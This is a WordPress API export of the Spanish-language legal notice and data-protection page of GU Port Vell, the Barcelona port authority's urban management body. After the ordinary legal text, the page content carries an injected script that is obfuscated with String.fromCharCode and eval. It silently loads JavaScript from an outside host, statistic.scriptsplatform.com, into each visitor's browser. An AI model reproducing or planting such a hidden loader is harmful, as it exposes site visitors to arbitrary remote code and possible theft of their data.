{"id":13935,"date":"2023-07-25T12:40:36","date_gmt":"2023-07-25T10:40:36","guid":{"rendered":"https:\/\/portvellbcn.cat\/aviso-legal-2\/"},"modified":"2023-07-25T12:40:56","modified_gmt":"2023-07-25T10:40:56","slug":"aviso-legal-2","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/aviso-legal-2\/","title":{"rendered":"Aviso Legal"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1585903371505{margin-bottom: 20px !important;}\u00bb]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Aviso Legal<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text]<\/p>\n<div id=\"main\" class=\"s-main\" role=\"main\">\n<div class=\"s-content\">\n<div class=\"m-generic\">\n<div class=\"module-main\">\n<p><span style=\"font-size: 14px;\">La empresa titular de este sitio web es Gerencia Urban\u00edstica GU Port Vell de la Autoridad Portuaria de Barcelona, \u200b\u200bMP (en adelante GU Port Vell), con sede en el calle Josep Anselm Clav\u00e9 27, Principal, (08002 Barcelona), correo electr\u00f3nico <strong><a href=\"mailto:%20info@portvellbcn.com\">info@portvellbcn.cat<\/a><\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 14px;\"><strong>PROPIEDAD INTELECTUAL<\/strong><\/span><\/p>\n<p><span style=\"font-size: 14px;\">GU Port Vell es titular de todos los contenidos del presente sitio web, incluyendo sin car\u00e1cter limitativo, textos, gr\u00e1ficos, im\u00e1genes, su dise\u00f1o y los derechos de propiedad intelectual que puedan corresponder a dichos contenidos, y quedan reservados todos los derechos sobre los contenidos mencionados. Queda prohibido cualquier acto de reproducci\u00f3n de los contenidos, en su totalidad o en parte, en cualquier forma o medio, tanto mec\u00e1nico, electr\u00f3nico, reprogr\u00e1fico u otro, as\u00ed como cualquier acto de difusi\u00f3n, comunicaci\u00f3n p\u00fablica o distribuci\u00f3n, sin la autorizaci\u00f3n previa por escrito de GU Port Vell.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">GU Port Vell no se hace responsable de los da\u00f1os y perjudicios que puedan derivarse de la utilizaci\u00f3n de los contenidos por parte de las personas usuarias o de las infracciones que dichas personas pueden cometer de cualquier disposici\u00f3n legal vigente.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">GU Port Vell pon enlaces a disposici\u00f3n de los usuarios para facilitar la b\u00fasqueda y el acceso a informaci\u00f3n, a servicios ya otros contenidos disponibles en Internet. Los enlaces habilitados pueden conducir al usuario a otros sitios y p\u00e1ginas webs gestionados por terceros, sobre los que GU Port Vell no ejerce ning\u00fan tipo de control. GU Port Vell no asume ning\u00fan deber de vigilar ni de verificar las informaciones o los contenidos de otras p\u00e1ginas web a las que se pueda acceder desde su web.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 14px;\"><strong>POL\u00cdTICA DE PROTECCI\u00d3N DE DATOS DE CAR\u00c1CTER PERSONAL<\/strong><\/span><\/p>\n<p><span style=\"font-size: 14px;\">A efectos de lo previsto en la legislaci\u00f3n vigente sobre protecci\u00f3n de datos de car\u00e1cter personal, GU Port Vell informa al usuario de la existencia de un archivo automatizado de datos de car\u00e1cter personal creado por GU Port Vell bajo su responsabilidad, con la finalidad de llevar a cabo el mantenimiento y la gesti\u00f3n de la relaci\u00f3n con los solicitantes de informaci\u00f3n o usuarios que hayan accedido a trav\u00e9s de formularios electr\u00f3nicos de GU Port Vell habilitados. Dicho archivo se encuentra debidamente inscrito en la Agencia de Protecci\u00f3n de Datos y se encuentra en el sistema inform\u00e1tico de GU Port Vell.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">Las datos que el usuario facilita son recogidas por GU Port Vell con la finalidad de gestionar su solicitud y tramitar los servicios que solicite, as\u00ed como facilitarle informaci\u00f3n de los servicios que puedan interesarle.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">El env\u00edo de las datos, mediante el uso de los formularios electr\u00f3nicos de GU Port Vell o mensajes de correo electr\u00f3nico, supone el consentimiento expreso del remitente al tratamiento automatizado de las datos incluidas en los medios de comunicaci\u00f3n indicados, a la vez que consiente tambi\u00e9n al env\u00edo de comunicaciones por v\u00eda electr\u00f3nica con informaci\u00f3n de nuestros servicios. La aceptaci\u00f3n del usuario del tratamiento de sus datos y de la recepci\u00f3n de comunicaciones comerciales por v\u00eda electr\u00f3nica tiene siempre un car\u00e1cter revocable sin efectos retroactivos, conforme a lo dispuesto en la legislaci\u00f3n vigente.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">El usuario podr\u00e1 ejercer sus derechos de acceso al tratamiento de sus datos personales as\u00ed como de rectificaci\u00f3n, oposici\u00f3n y cancelaci\u00f3n de \u00e9stos, en los t\u00e9rminos y condiciones previstos en la legislaci\u00f3n vigente. Podr\u00e1 ejercer los derechos mencionados dirigi\u00e9ndose a GU Port Vell, calle Josep Anselm Clav\u00e9 27 (08002 Barcelona), o bien en la siguiente direcci\u00f3n de correo electr\u00f3nico <strong><a href=\"mailto:info@portvellbcn.com\">info@portvellbcn.cat<\/a><\/strong><\/span><\/p>\n<p><span style=\"font-size: 14px;\">GU Port Vell se compromete a cumplir con el deber de secreto y confidencialidad de las datos contenidos en el archivo automatizado de acuerdo con la legislaci\u00f3n aplicable.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">GU Port Vell no se responsabiliza de la eventual existencia de virus u otros elementos nocivos, introducidos en sus sistemas inform\u00e1ticos, que puedan afectar al equipo inform\u00e1tico del usuario, ni de las consecuencias perjudiciales que \u00e9stos puedan producir.<\/span><\/p>\n<p><span style=\"font-size: 14px;\">La APB mantiene su p\u00e1gina web lo m\u00e1s actualizada posible a partir de aportaciones propias y externas. Por ello, y dado el gran volumen de informaci\u00f3n que contiene, pueden producirse errores, inexactitudes, errores y faltas puntuales de actualizaci\u00f3n. En este sentido, aunque estas incidencias no son siempre responsabilidad de GU Port Vell, la gerencia agrade las comunicaciones de los usuarios con el objetivo de corregirlas.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<footer class=\"s-footer\">\n<nav class=\"n-extra\">\n<h3 class=\"nav-title\"><\/h3>\n<\/nav>\n<\/footer>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=\u00bb50&#8243;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1585903371505{margin-bottom: 20px !important;}\u00bb] Aviso Legal [\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text] La empresa titular de este sitio web es Gerencia Urban\u00edstica GU Port Vell de la Autoridad Portuaria de Barcelona, \u200b\u200bMP (en adelante GU Port Vell), con sede en el calle Josep Anselm Clav\u00e9 27, Principal, (08002 Barcelona), correo electr\u00f3nico info@portvellbcn.cat &nbsp; PROPIEDAD INTELECTUAL GU Port Vell es titular de todos los contenidos del presente sitio web, incluyendo sin car\u00e1cter limitativo, textos, gr\u00e1ficos, im\u00e1genes, su dise\u00f1o y los derechos de propiedad intelectual que puedan corresponder a dichos contenidos, y quedan reservados todos los derechos sobre los contenidos mencionados. Queda prohibido cualquier acto de reproducci\u00f3n de los contenidos, en su totalidad o en parte, en cualquier forma o medio, tanto mec\u00e1nico, electr\u00f3nico, reprogr\u00e1fico u otro, as\u00ed como cualquier acto de difusi\u00f3n, comunicaci\u00f3n p\u00fablica o distribuci\u00f3n, sin la autorizaci\u00f3n previa por escrito de GU Port Vell. GU Port Vell no se hace responsable de los da\u00f1os y perjudicios que puedan derivarse de la utilizaci\u00f3n de los contenidos por parte de las personas usuarias o de las infracciones que dichas personas pueden cometer de cualquier disposici\u00f3n legal vigente. GU Port Vell pon enlaces a disposici\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13935","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13935","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13935"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13935\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13935"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}